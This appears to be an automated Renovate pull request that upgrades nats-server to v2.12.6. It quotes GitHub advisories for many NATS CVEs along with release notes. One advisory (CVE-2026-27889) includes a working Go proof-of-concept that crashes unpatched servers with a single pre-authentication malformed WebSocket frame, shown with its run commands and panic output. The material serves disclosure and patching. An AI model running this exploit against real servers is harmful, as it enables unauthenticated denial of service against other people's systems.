
fix(deps): update module github.com/nats-io/nats-server/v2 to v2.12.6 [security]#573

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-nats-io-nats-server-v2-vulnerability

Conversation

renovate[bot] commented Feb 24, 2026

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package                            Change              Age  Confidence
github.com/nats-io/nats-server/v2  v2.12.1 -> v2.12.6  age  confidence

nats-server websockets are vulnerable to pre-auth memory DoS

CVE-2026-27571 / GHSA-qrvq-68c2-7grw

Details

Impact

The WebSockets handling of NATS messages handles compressed messages via the WebSockets negotiated compression. The implementation bound the memory size of a NATS message but did not independently bound the memory consumption of the memory stream when constructing a NATS message which might then fail validation for size reasons.

An attacker can use a compression bomb to cause excessive memory consumption, often resulting in the operating system terminating the server process.

The use of compression is negotiated before authentication, so this does not require valid NATS credentials to exploit.

The fix was to bound the decompression so that it fails once the message is too large, instead of continuing on.

Patches

This was released in nats-server without being highlighted as a security issue. It should have been, this was an oversight. Per the NATS security policy, because this does not require a valid user, it is CVE-worthy.

This was fixed in the v2.11 series with v2.11.12 and in the v2.12 series with v2.12.3.

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points.

References

This was reported to the NATS maintainers by Pavel Kohout of Aisle Research (www.aisle.com).

Severity

  • CVSS Score: 5.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS: Message tracing can be redirected to arbitrary subject

CVE-2026-33249 / GHSA-8m2x-3m6q-6w8j

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server supports telemetry on messages, using the per-message NATS headers.

Problem Description

A valid client which uses message tracing headers can indicate that the trace messages can be sent to an arbitrary valid subject, including those to which the client does not have publish permission.

The payload is a valid trace message and not chosen by the attacker.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 4.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS credentials are exposed in monitoring port via command-line argv

CVE-2026-33247 / GHSA-x6g4-f6q3-fqvv

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an optional monitoring port, which provides access to sensitive data. The nats-server can take certain configuration options on the command-line instead of requiring a configuration file.

Problem Description

If a nats-server is run with static credentials for all clients provided via argv (the command-line), then those credentials are visible to any user who can see the monitoring port, if that too is enabled.

The /debug/vars end-point contains an unredacted copy of argv.

Patches

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

The NATS Maintainers are bemused at the concept of someone deploying a real configuration using --pass to avoid a config file, but also enabling monitoring.

Configure credentials inside a configuration file instead of via argv.

Do not enable the monitoring port if using secrets in argv.

Best practice remains to not expose the monitoring port to the Internet, or to untrusted network sources.

Severity

  • CVSS Score: 7.4 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS Server panic via malicious compression on leafnode port

CVE-2026-29785 / GHSA-52jh-2xxh-pwh6

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When configured to accept leafnode connections (for a hub/spoke topology of multiple nats-servers), then the default configuration allows for negotiating compression; a malicious remote NATS server can trigger a server panic via that compression.

Problem Description

If the nats-server has the "leafnode" configuration enabled (not default), then anyone who can connect can crash the nats-server by triggering a panic. This happens pre-authentication and requires that compression be enabled (which it is, by default, when leafnodes are used).

Context: a NATS server can form various clustering topologies, including local clusters, and superclusters of clusters, but leafnodes allow for separate administrative domains to link together with limited data communication; eg, a server in a moving vehicle might use a local leafnode for agents to connect to, and sync up to a central service as and when available. The leafnode configuration here is where the central server allows other NATS servers to connect into it, almost like regular NATS clients. Documentation examples typically use port 7422 for leafnode communications.

Affected Versions

Version 2, prior to v2.11.14 or v2.12.5

Workarounds

Disable compression on the leafnode port:

leafnodes {
  port: 7422
  compression: off
}

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS is vulnerable to MQTT hijacking via Client ID

CVE-2026-33215 / GHSA-fcjp-h8cc-6879

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

Sessions and Messages can be hijacked via MQTT Client ID malfeasance.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS has MQTT plaintext password disclosure

CVE-2026-33216 / GHSA-v722-jcv5-w7mc

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

For MQTT deployments using usercodes/passwords: MQTT passwords are incorrectly classified as a non-authenticating identity statement (JWT) and exposed via monitoring endpoints.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Ensure monitoring end-points are adequately secured.

Best practice remains to not expose the monitoring endpoint to the Internet or other untrusted network users.

Severity

  • CVSS Score: 8.6 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS allows MQTT clients to bypass ACL checks

CVE-2026-33217 / GHSA-jxxm-27vp-c3m5

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server provides an MQTT client interface.

Problem Description

When using ACLs on message subjects, these ACLs were not applied in the $MQTT.> namespace, allowing MQTT clients to bypass ACL checks for MQTT subjects.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 7.1 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS has pre-auth server panic via leafnode handling

CVE-2026-33218 / GHSA-vprv-35vv-q339

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers.

Problem Description

A client which can connect to the leafnode port can crash the nats-server with a certain malformed message pre-authentication.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

  1. Disable leafnode support if not needed.
  2. Restrict network connections to your leafnode port, if plausible without compromising the service offered.

References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS is vulnerable to pre-auth DoS through WebSockets client service

CVE-2026-33219 / GHSA-8r68-gvr4-jh7j

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a WebSockets client service, used in deployments where browsers are the NATS clients.

Problem Description

A malicious client which can connect to the WebSockets port can cause unbounded memory use in the nats-server before authentication; this requires sending a corresponding amount of data.

This is a milder variant of NATS-advisory-ID 2026-02 (aka CVE-2026-27571; GHSA-qrvq-68c2-7grw).
That earlier issue was a compression bomb, this vulnerability is not. Attacks against this new issue thus require significant client bandwidth.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

Disable websockets if not required for project deployment.

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS JetStream has an authorization bypass through its Management API

CVE-2026-33222 / GHSA-9983-vrx2-fg9c

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The persistent storage feature, JetStream, has a management API which has many features, amongst which are backup and restore.

Problem Description

Users with JetStream admin API access to restore one stream could restore to other stream names, impacting data which should have been protected against them.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

If developers have configured users to have limited JetStream restore permissions, temporarily remove those permissions.

Severity

  • CVSS Score: 4.9 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS Server: Incomplete Stripping of Nats-Request-Info Header Allows Identity Spoofing

CVE-2026-33223 / GHSA-pwx7-fx9r-hr4h

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server offers a Nats-Request-Info: message header, providing information about a request.

Problem Description

The NATS message header Nats-Request-Info: is supposed to be a guarantee of identity by the NATS server, but the stripping of this header from inbound messages was not fully effective.

An attacker with valid credentials for any regular client interface could thus spoof their identity to services which rely upon this header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 6.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS: Leafnode connections allow spoofing of Nats-Request-Info identity headers

CVE-2026-33246 / GHSA-55h8-8g96-x4hj

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

The nats-server allows hub/spoke topologies using "leafnode" connections by other nats-servers. NATS messages can have headers.

Problem Description

The nats-server offers a Nats-Request-Info: message header, providing information about a request. This is supposed to provide enough information to allow for account/user identification, such that NATS clients could make their own decisions on how to trust a message, provided that they trust the nats-server as a broker.

A leafnode connecting to a nats-server is not fully trusted unless the system account is bridged too. Thus identity claims should not have propagated unchecked.

Thus NATS clients relying upon the Nats-Request-Info: header could be spoofed.

Does not directly affect the nats-server itself, but the CVSS Confidentiality and Integrity scores are based upon what a hypothetical client might choose to do with this NATS header.

Affected Versions

Any version before v2.12.6 or v2.11.15

Workarounds

None.

Severity

  • CVSS Score: 6.4 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS has mTLS verify_and_map authentication bypass via incorrect Subject DN matching

CVE-2026-33248 / GHSA-3f24-pcvm-5jqc

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

One authentication model supported is mTLS, deriving the NATS client identity from properties of the TLS Client Certificate.

Problem Description

When using mTLS for client identity, with verify_and_map to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass.

This does require a valid certificate from a CA already trusted for client certificates, and DN naming patterns which the NATS maintainers consider highly unlikely.

So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their DN construction patterns might conceivably be impacted.

Affected Versions

Fixed in nats-server 2.12.6 & 2.11.15

Workarounds

Developers should review their CA issuing practices.

Severity

  • CVSS Score: 4.2 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


NATS: Pre-auth remote server crash via WebSocket frame length overflow in wsRead

CVE-2026-27889 / GHSA-pq2q-rcw4-3hr6

Details

Background

NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.

When using WebSockets, a malicious client can trigger a server crash with crafted frames, before authentication.

Problem Description

A missing sanity check on a WebSockets frame could trigger a server panic in the nats-server. This happens before authentication, and so is exposed to anyone who can connect to the websockets port.

Affected versions

Version 2 from v2.2.0 onwards, prior to v2.11.14 or v2.12.5

Workarounds

This only affects deployments which use WebSockets and which expose the network port to untrusted end-points. If able to do so, a defense in depth of restricting either of these will mitigate the attack.

Solution

Upgrade the NATS server to a fixed version.

Credits

This was reported to the NATS maintainers by GitHub user Mistz1.
Also independently reported by GitHub user jiayuqi7813.


Report by @Mistz1

Summary

An unauthenticated remote attacker can crash the entire nats-server process by sending a single malicious WebSocket frame (15 bytes after the HTTP upgrade handshake). The server fails to validate the RFC 6455 §5.2 requirement that the most significant bit of a 64-bit extended payload length must be zero. The resulting uint64 → int conversion produces a negative value, which bypasses the bounds clamp and triggers an unrecovered panic in the connection's goroutine — killing the entire server process and disconnecting all clients. This affects all platforms (64-bit and 32-bit).

Details

Vulnerable code: server/websocket.go line 278

r.rem = int(binary.BigEndian.Uint64(tmpBuf))

When a WebSocket frame uses the 64-bit extended payload length (length code 127), the server reads 8 bytes and casts the raw uint64 directly to int with no validation. RFC 6455 §5.2 states: "the most significant bit MUST be 0" — but nats-server never checks this.

Attack chain:

  1. The attacker sends a WebSocket frame with the MSB set in the 64-bit length field (e.g., 0x8000000000000001).

  2. At line 278, int(0x8000000000000001) produces -9223372036854775807 on 64-bit Go (two's complement reinterpretation — Go does not panic on integer conversion overflow).

  3. r.rem is now negative. At line 307–311, the bounds clamp fails:

    n = r.rem                    // n = -9223372036854775807
    if pos+n > max {             // 14 + (-huge) = negative, NOT > max → FALSE
        n = max - pos            // clamp NEVER fires
    }
    b = buf[pos : pos+n]         // buf[14 : -9223372036854775793] → PANIC

    The addition pos + n wraps to a negative value (Go signed integer overflow is defined behavior — it wraps silently). Since the negative result is never greater than max, the clamp is skipped. The slice expression at line 311 reaches the Go runtime bounds check, which panics.

  4. There is no defer recover() anywhere in the goroutine chain:

    The unrecovered panic propagates to Go's runtime, which calls os.Exit(2). The entire nats-server process terminates.

  5. The WebSocket frame is parsed in wsRead() called from readLoop(), which starts immediately after the HTTP upgrade — before any NATS CONNECT authentication. No credentials are required.

Why 15 bytes, not 14: The 14-byte frame header (opcode + length + mask key) exactly fills the read buffer on the first call, so pos == max and the payload loop at line 303 (if pos < max) is skipped. The poisoned r.rem persists in the wsReadInfo struct. One additional byte of "payload" is needed so that pos < max on either the same or next read, entering the panic path at line 311.

PoC

Server configuration (test-ws.conf):

listen: 127.0.0.1:4222

websocket {
    listen: "127.0.0.1:9222"
    no_tls: true
}

Start the server:

nats-server -c test-ws.conf

Exploit (poc_ws_crash.go):

package main

import (
	"bufio"
	"encoding/binary"
	"fmt"
	"net"
	"net/http"
	"os"
	"time"
)

func main() {
	target := "127.0.0.1:9222"
	if len(os.Args) > 1 {
		target = os.Args[1]
	}

	fmt.Printf("[*] Connecting to %s...\n", target)
	conn, err := net.DialTimeout("tcp", target, 5*time.Second)
	if err != nil {
		fmt.Printf("[-] Connection failed: %v\n", err)
		os.Exit(1)
	}
	defer conn.Close()

	// WebSocket upgrade
	req, _ := http.NewRequest("GET", "http://"+target, nil)
	req.Header.Set("Upgrade", "websocket")
	req.Header.Set("Connection", "Upgrade")
	req.Header.Set("Sec-WebSocket-Key", "dGhlIHNhbXBsZSBub25jZQ==")
	req.Header.Set("Sec-WebSocket-Version", "13")
	req.Header.Set("Sec-WebSocket-Protocol", "nats")
	req.Write(conn)

	conn.SetReadDeadline(time.Now().Add(5 * time.Second))
	resp, err := http.ReadResponse(bufio.NewReader(conn), req)
	if err != nil || resp.StatusCode != 101 {
		fmt.Printf("[-] Upgrade failed\n")
		os.Exit(1)
	}
	fmt.Println("[+] WebSocket established")
	conn.SetReadDeadline(time.Time{})

	// Malicious frame: FIN+Binary, MASK+127, 8-byte length with MSB set, mask key, 1 payload byte
	frame := make([]byte, 15)
	frame[0] = 0x82                                             // FIN + Binary
	frame[1] = 0xFF                                             // MASK + 127 (64-bit length)
	binary.BigEndian.PutUint64(frame[2:10], 0x8000000000000001) // MSB set
	frame[10] = 0xDE                                            // Mask key
	frame[11] = 0xAD
	frame[12] = 0xBE
	frame[13] = 0xEF
	frame[14] = 0x41                                            // 1 payload byte

	fmt.Printf("[*] Sending: %x\n", frame)
	conn.Write(frame)

	time.Sleep(2 * time.Second)

	// Verify crash
	conn2, err := net.DialTimeout("tcp", target, 3*time.Second)
	if err != nil {
		fmt.Println("[!!!] SERVER IS DOWN — full process crash confirmed")
		os.Exit(0)
	}
	conn2.Close()
	fmt.Println("[-] Server still running")
}

Run:

go build -o poc_ws_crash poc_ws_crash.go
./poc_ws_crash

Observed server output before termination:

panic: runtime error: slice bounds out of range [:-9223372036854775793]

goroutine 13 [running]:
github.com/nats-io/nats-server/v2/server.(*client).wsRead(...)
        server/websocket.go:311 +0xa93
github.com/nats-io/nats-server/v2/server.(*client).readLoop(...)
        server/client.go:1434 +0x768
github.com/nats-io/nats-server/v2/server.(*Server).startGoRoutine.func1()
        server/server.go:4078 +0x32

Tested against: nats-server v2.14.0-dev (commit a69f51f), Go 1.25.7, linux/amd64.

Impact

Vulnerability type: Pre-authentication remote denial of service (full process crash).

Who is impacted: Any nats-server deployment with WebSocket listeners enabled (websocket { ... } in config), including MQTT-over-WebSocket. This is an increasingly common configuration for browser-based and IoT clients. The attacker needs only TCP access to the WebSocket port — no credentials, no valid NATS client, no TLS client certificate.

Severity: A single unauthenticated TCP connection sending 15 bytes crashes the entire server process. All connected clients (NATS, WebSocket, MQTT, cluster routes, gateways, leaf nodes) are immediately disconnected. JetStream in-flight acknowledgments are lost and Raft consensus is disrupted in clustered deployments. The attack is repeatable on every server restart.

Affected platforms: All — confirmed on 64-bit (linux/amd64); 32-bit platforms (linux/386, linux/arm) are also affected with additional frame-desync consequences.

(NATS retains the original external report below the cut, with exploit details.
This issue was also independently reported by GitHub user @jiayuqi7813 before publication; they provided a Python exploit.)

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).
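The length-field check the report above describes, as an added example (not nats-server's code or its fix): a hardened frame-header parser next to the unchecked uint64-to-int cast, plus the read-buffer clamp arithmetic. It goes beyond the RFC 6455 §5.2 MSB check by also bounding the length against a caller-supplied maxPayload, because Go's wrapping addition lets a very large MSB-clear length skip the same clamp. The names parseHeader, clampBypassed, unsafeLength64 and the sample frame are this example's own assumptions.

```go
package main

import (
	"encoding/binary"
	"errors"
)

// Constructed sample frame with the shape the report describes: FIN+Binary, MASK bit
// with length code 127, an 8-byte length whose MSB is set, a 4-byte mask key and one
// payload byte (15 bytes in total). Not captured traffic.
var poisonedFrame = []byte{
	0x82, 0xFF,
	0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
	0xDE, 0xAD, 0xBE, 0xEF,
	0x41,
}

// ErrBadFrameLength: length violates RFC 6455 §5.2 (MSB must be 0) or exceeds maxPayload.
var ErrBadFrameLength = errors.New("websocket: invalid payload length")

type frameHeader struct {
	fin     bool
	opcode  byte
	masked  bool
	length  int     // payload length in bytes
	maskKey [4]byte // only meaningful when masked
	size    int     // header bytes consumed; payload starts at this offset
}

// unsafeLength64 mirrors the conversion the report flags: raw uint64 cast straight to int.
func unsafeLength64(b []byte) int { return int(binary.BigEndian.Uint64(b)) }

// parseHeader decodes a frame header and validates the length field the way a hardened
// reader should (hypothetical code, not nats-server's patch). maxPayload must be >= 0.
func parseHeader(frame []byte, maxPayload int) (frameHeader, error) {
	var h frameHeader
	need := func(n int) error {
		if len(frame) < n {
			return errors.New("websocket: truncated header")
		}
		return nil
	}
	if err := need(2); err != nil {
		return h, err
	}
	h.fin = frame[0]&0x80 != 0
	h.opcode = frame[0] & 0x0F
	h.masked = frame[1]&0x80 != 0
	code := int(frame[1] & 0x7F)
	pos := 2
	switch {
	case code < 126:
		h.length = code
	case code == 126:
		if err := need(pos + 2); err != nil {
			return h, err
		}
		h.length = int(binary.BigEndian.Uint16(frame[pos:]))
		pos += 2
	default: // 127: 64-bit extended length
		if err := need(pos + 8); err != nil {
			return h, err
		}
		v := binary.BigEndian.Uint64(frame[pos:])
		if v&(1<<63) != 0 { // RFC 6455 §5.2: the most significant bit MUST be 0
			return h, ErrBadFrameLength
		}
		if v > uint64(maxPayload) { // compare before converting: also safe on 32-bit
			return h, ErrBadFrameLength
		}
		h.length = int(v)
		pos += 8
	}
	if h.length > maxPayload { // covers the 7-bit and 16-bit encodings too
		return h, ErrBadFrameLength
	}
	if h.masked {
		if err := need(pos + 4); err != nil {
			return h, err
		}
		copy(h.maskKey[:], frame[pos:pos+4])
		pos += 4
	}
	h.size = pos
	return h, nil
}

// clampBypassed reproduces the read-buffer clamp quoted in the report and reports whether
// a remaining length rem slips past it, i.e. whether buf[pos:pos+n] would be an invalid
// slice range. Go addition wraps silently, so a negative rem and a huge positive rem both win.
func clampBypassed(pos, rem, max int) bool {
	n := rem
	if pos+n > max {
		n = max - pos
	}
	end := pos + n
	return end < pos || end > max
}
```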


Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.12.6

Compare Source

Changelog

Refer to the 2.12 Upgrade Guide for backwards compatibility notes with 2.11.x.

Go Version

  • 1.25.8

Dependencies

CVEs

Improved

General

  • Non-WebSocket leafnode connections can now be proxied using HTTP CONNECT (#​7781)
  • The $SYS.REQ.USER.INFO response now includes the friendly nametag of the account and/or user if known (#​7973)

JetStream

  • The stream peer-remove command now accepts a peer ID as well as a server name (#​7952)

MQTT

  • Protocol compliance has been improved, including more error handling on invalid or malformed MQTT packets (#​7933)

Fixed

General

  • Client connections are no longer registered after an auth callout timeout (#​7932)
  • Improved handling of duplicate headers
  • A correctness bug when validating relative distinguished names has been fixed
  • Secrets are now redacted correctly in trace logging (#​7942)
  • The expvar endpoint on the monitoring port now correctly redacts secrets from the command line arguments
  • Trace headers are no longer incorrectly parsed when hitting max payload (#​7954)
  • When running as a Windows service, switching to lame duck mode should now correctly exit the process (#​7958)
  • The configuration digest no longer removes from the used variable tracking, which could cause configuration fields to disappear from the returned config (#​7959)
  • A bug which could result in the service import cycle detection failing to detect a genuine cycle has been fixed (#​7961)
  • The PROXY protocol v1 header parser no longer incorrectly discards some early protocol bytes from the client (#​7962)
  • The Nats-Trace-Dest message header for message tracing now requires that the client have publish permissions to the specified subject, an error is returned otherwise
  • The route pool is now correctly populated if receiving a pong before handling the new route setup (#​7971)

Leafnodes

  • A panic when receiving a loop detection error before a connect message has been fixed
  • Messages from leafnodes to non-shared service imports now correctly rebuild the request info header
  • Leafnodes will now back off on receiving a minimum version required error, no longer requiring blocking the readloop (#​7970)

JetStream

  • Stream updates on clustered setups with async snapshots enabled should no longer result in the loss of consumer assignments, fixing the regression introduced in 2.12.5 (#​7939)
  • Fixed idempotent stream create with sources (#​7928)
  • Fixed a bug where mirror goroutines could get stuck stalling the mirror indefinitely (#​7929)
  • A panic that could occur when attempting to scale down a stream with an in-flight stream create and consumer create has been fixed (#​7940)
  • A panic when paginating on various JetStream API endpoints has been fixed
  • An interior path traversal bug that could occur when purging JetStream accounts has been fixed
  • Meta snapshot apply errors are now surfaced correctly so that the cluster monitor does not advance the applied index (#​7944)
  • Fixed an issue where extremely large JetStream reservations could overflow and violate tier limits
  • Stream restores now ensure that the stream name in the restore subject matches that of the restored snapshot archive
  • Stream ingest now correctly strips a NATS status header if present, avoiding incorrect classification of sourced or mirrored messages as control traffic
  • The Raft layer now resets the vote correctly when switching to candidate state (#​7956)
  • The orphan consumer check no longer unexpectedly deletes direct consumers, which could affect sourcing and mirroring (#​7957)
  • The Raft layer no longer commits entries from previous terms by only allowing entries from our current term up to the commit (#​7955)
  • Stream restores are now processed directly from the wire without intermediate staging on the filesystem, improving the enforcement of limits and reservations on disk
  • Stream sourcing now works correctly when sourcing into a stream with the Discard New Per Subject discard policy (#​7896)

MQTT

  • A panic that could occur when processing invalid fixed32 or fixed64 fields has been fixed (#​7941)
  • Persisted MQTT sessions can no longer be restored by a non-matching client ID
  • Restrict the implicit permissions for MQTT clients to $MQTT.sub. and $MQTT.deliver.pubrel. prefixes
  • MQTT password are no longer exposed in the JWT field of monitoring endpoints or advisory messages
  • NATS special characters (., >, *, spaces, tabs) are no longer permitted in MQTT client IDs
  • MQTT session flapping detection now uses monotonic time, fixing cases where it could be sensitive to NTP adjustments or clock drifts

WebSockets

  • WebSocket protocol parsing no longer relies on potentially unbounded in-memory allocations from compressed or uncompressed frames

Complete Changes

v2.12.5

Compare Source

Changelog

Refer to the 2.12 Upgrade Guide for backwards compatibility notes with 2.11.x.

[!WARNING]
A regression has been found in this version where a stream update may result in the loss of consumers in clustered deployments in specific cases. Single-server deployments are not affected. To temporarily mitigate, set meta_compact_sync: true in the jetstream config block and perform a configuration reload. We will soon follow up with a fixed 2.12.6 release.

Go Version

  • 1.25.8

Dependencies

  • github.com/nats-io/nkeys v0.4.15 (#​7797)
  • github.com/klauspost/compress v1.18.4 (#​7812)
  • golang.org/x/sys v0.42.0 (#​7923)
  • github.com/antithesishq/antithesis-sdk-go v0.6.0-default-no-op (#​7835)
  • golang.org/x/crypto v0.48.0 (#​7874)
  • github.com/nats-io/nats.go v1.49.0 (#​7835)
  • golang.org/x/time v0.15.0 (#​7923)

CVEs

Added

JetStream

  • The stream snapshot/backup endpoint now accepts the window_size parameter, to allow improving flow control over slow or unreliable connections (#​7839)

Improved

General

  • max_conns in the server configuration can now be configured to 0 (zero) to reject all incoming client connections (#​7877)

JetStream

  • "Catchup for stream" log lines are now more consistent (#​7784)
  • Raft now only accepts forwarded proposals if caught up as the new leader, limiting potentially unbounded log growth (#​7809)
  • Raft now correctly refuses concurrent membership changes if forwarded a peer removal from another node (#​7809)
  • The max_consumers limit of a stream can now be updated after stream creation (#​7724)
  • The pending messages and bytes are now included in consumer unpin responses (#​7815)
  • Stream backups/snapshots are now streamed to clients with improved flow control, which should improve throughput and robustness, particularly over unreliable links, reducing the chance of backups failing due to flow control errors (#​7828)
  • Orphaned stream and consumer checks are now aligned with the metalayer snapshot logic (#​7826)
  • Wildcard filtering when loading messages is now considerably faster in the memory store (#​7840, #​7855)
  • Metalayer snapshots now take place asynchronously when possible, such that JS API operations are not blocked while the snapshot is taking place (#​7827, #​7846)
    • This behaviour can be disabled by setting meta_compact_sync: true in the jetstream configuration block
  • Consumers with a single subject filter no longer incorrectly use the multi-filter message lookups (#​7856)
  • The check for colliding stream subjects is now faster (#​7870)
  • Raft replica lag and current values in stream info, consumer info and /jsz are now more consistent, no longer reporting incorrect values on follower nodes (#​7885)
  • Num pending calculations for R1 consumers now happen asynchronously and should no longer block the metalayer (#​7889)

Fixed

General

  • Routed message arguments no longer escape to the heap, improving performance (#​7867)
  • Malformed functions or operations in user permissions templates or on invalid template expansion during auth should no longer result in a server panic

Leafnodes

  • A crash when leafnodes with bad credentials performs an auth callout has been fixed (#​7844)
  • Receiving a leafnode subscription before negotiating compression should no longer result in a server panic

JetStream

  • A filestore bug which could hold onto a lock when exiting after an error has been fixed (#​7780)
  • The filestore now always uses tombstones for recovering trailing deletes (#​7782)
  • Fixed a race condition when rebuilding block state during recovery (#​7783)
  • The filestore binary search for a message block now correctly sorts blocks that contain only tombstones (#​7787)
  • Fixed a data race for streams when acquiring the deduplication sequence (#​7789)
  • Raft now correctly checks the closed state when reporting if the node is current (#​7793)
  • Raft now sets the election timeout instead of the campaign timeout when leaving observer mode (#​7793)
  • The metalayer now tracks in-flight meta changes for invalid stream or consumer updates (#​7798)
  • The metalayer no longer incorrectly overwrites local consumer assignments before they are applied, which would result in them being omitted from the meta snapshot (#​7798)
  • The inactive threshold clean-up no longer leaves lingering goroutines (#​7799)
  • Pooled publish message underlying buffer capacity is now reused correctly (#​7790)
  • Consumers with overlapping filter subjects where one is not a subset of the other are now allowed (#​7810)
  • The filestore now checksums after truncation on compressed or encrypted stores (#​7816)
  • The filestore no longer leaks locks in various error states (#​7816)
  • The filestore now correctly holds the lock during snapshotting on encrypted stores (#​7816)
  • The filestore now ensures that num pending calculations cannot overflow (#​7816)
  • The filestore now correctly recalculates the subject state as needed when finding last sequences (#​7816)
  • The filestore now sorts configured subjects when checking whether filters represent all of the configured filters (#​7816)
  • The filestore now avoids subject and header corruption in more cases (#​7816)
  • Consumer unpinning is now handled correctly when stepping down (#​7819)
  • Consumer unpinning now allows the next client to pick up the next pin without waiting for new messages (#​7819)
  • Fixed a race condition when remapping the underlying group of a replicated asset (#​7820, #​7883)
  • An overflowed pull request when min pending or min ack pending is above the threshold is now handled correctly (#​7795)
  • Timers are no longer leaked when failing to set up mirrors, which resulted in high CPU usage (#​7825)
  • Monitor quit channels are created on demand, fixing cases where an asset restarts with a different underlying Raft group (#​7837)
  • Recovered streams and consumers are now correctly handled when not present in a metalayer catchup snapshot (#​7824)
  • Ensure that messages that have reached the max deliver state are preserved with the WorkQueue retention policy (#​7845)
  • An inconsistency with consumer naming between the current and legacy consumer create endpoints has been fixed (#​7848)
  • The Raft layer no longer incorrectly reverts the last snapshot applied sequence when truncating uncommitted entries after a catchup snapshot (#​7849)
  • The Raft layer no longer incorrectly restores the cluster size to 1 at startup, which could result in an isolated node incorrectly winning a single-node election (#​7850)
  • The memory store correctly refreshes the last sequence of a subject in the subject state tracking (#​7865)
  • Tiered reservations are now handled more consistently, fixing issues where replicated assets could be over-counted and where reservations were incorrectly applied on recovery (#​7880)
  • When scaling down a replicated consumer to R1, the correct consumer name is now used in the request where no durable name is set (#​7891)
  • Consumer deletion will now retry correctly when erroring with a directory not empty error (#​7886)
